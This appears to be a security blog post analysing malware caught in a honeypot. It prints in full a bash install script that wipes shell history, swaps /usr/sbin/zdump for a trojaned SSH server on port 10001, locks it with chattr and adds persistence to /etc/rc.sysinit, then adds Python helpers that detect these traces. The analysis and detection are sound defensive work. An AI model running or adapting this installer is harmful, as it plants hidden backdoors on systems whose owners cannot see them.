From my initial analysis it appears that the honeypot installs a hidden SSH server running on port 10001.
I haven't had much time to look through the entire package, but if you'd like to browse what was dropped off, I have uploaded everything to CaffSec-Malware-Analysis.
If you find anything interesting, please feel free to post a comment.
UPDATE: I have found a related article on TMCNET.com talking about a backdoor installed on port 10001. Read the article here: http://blog.tmcnet.com/blog/tom-keating/asterisk/hacked-asterisk-pbx-update.asp
Here is the install script for the main payload. Interesting stuff!
#!/bin/bash
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
unset history
mv libcrypto.so.4 /lib/
chattr -suia /usr/sbin/zdump
rm -rf /usr/sbin/zdump
mv sshd /usr/sbin/zdump
chattr +suia /usr/sbin/zdump
mkdir -p /usr/include/X11/.swap/
tar xvfz pic.tar.gz -C /usr/include/X11/.swap/ >>/dev/null
mkdir -p /usr/include/sound
mv sound.so /usr/include/sound/
mv sounds.h /usr/include/sound/
chmod 770 /usr/include/sound/sounds.h
/usr/include/sound/sounds.h
echo "# Now that we have all of our basic modules loaded and the kernel going,">>/etc/rc.sysinit
echo "# let's dump the syslog ring somewhere so we can find it later" >>/etc/rc.sysinit
echo "/usr/include/sound/sounds.h" >>/etc/rc.sysinit
sleep 10
echo "Enjoy your new box on port 10001"
cd ..
rm -rf rks*
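As an added defender-side example (not part of the original post or of the dropped package), the Python helpers below check for the traces this installer leaves behind: a non-comment line in /etc/rc.sysinit that executes something out of /usr/include, the s/u/i/a attributes the script puts on its replacement /usr/sbin/zdump, and a process listening on port 10001. The inputs are constructed samples standing in for the real /etc/rc.sysinit, `lsattr -d` output and `ss -lntp` output on a suspect host; the output formats assumed are those of current e2fsprogs and iproute2.

```python
import re

# Artefacts the install script above leaves behind (paths taken from it).
DROPPED_PATHS = [
    "/usr/include/sound/sounds.h",
    "/usr/include/sound/sound.so",
    "/usr/include/X11/.swap",
    "/lib/libcrypto.so.4",
]
BACKDOOR_PORT = 10001

def rc_sysinit_hits(rc_text):
    """Non-comment rc.sysinit lines that run something under /usr/include (a header
    directory should never hold executables) or reference a dropped path. Match on
    the executed path, not on comment text, which is easy to copy from a real file."""
    hits = []
    for ln in rc_text.splitlines():
        s = ln.strip()
        if not s or s.startswith("#"):
            continue
        if "/usr/include/" in s or any(p in s for p in DROPPED_PATHS):
            hits.append(s)
    return hits

def locked_files(lsattr_text):
    """Paths in `lsattr -d` output carrying any of the s/u/i/a attributes the
    script sets on its replacement /usr/sbin/zdump (chattr +suia)."""
    hits = []
    for ln in lsattr_text.splitlines():
        if ln.strip():
            flags, path = ln.split(None, 1)
            if set(flags) & set("suia"):
                hits.append(path.strip())
    return hits

def listeners_on_port(ss_text, port=BACKDOOR_PORT):
    """Process names bound to `port` in `ss -lntp` output."""
    pat = re.compile(r'\S+:(\d+)\s+\S+\s+users:\(\("([^"]+)"')
    return [m.group(2) for m in map(pat.search, ss_text.splitlines())
            if m and int(m.group(1)) == port]

# Constructed samples mimicking a host on which the script has run.
SAMPLE_RC = "# let's dump the syslog ring somewhere so we can find it later\n/usr/include/sound/sounds.h\n"
SAMPLE_LSATTR = "s-ia---------e-- /usr/sbin/zdump\n-------------e-- /usr/sbin/sshd\n"
SAMPLE_SS = ('LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=900,fd=3))\n'
             'LISTEN 0 128 0.0.0.0:10001 0.0.0.0:* users:(("zdump",pid=1234,fd=3))\n')

if __name__ == "__main__":
    print(rc_sysinit_hits(SAMPLE_RC), locked_files(SAMPLE_LSATTR), listeners_on_port(SAMPLE_SS))
```

On a real host, a genuine zdump is a small timezone utility that should carry no immutable or append-only attributes, so a hit from locked_files on that path is worth a package verification of the binary.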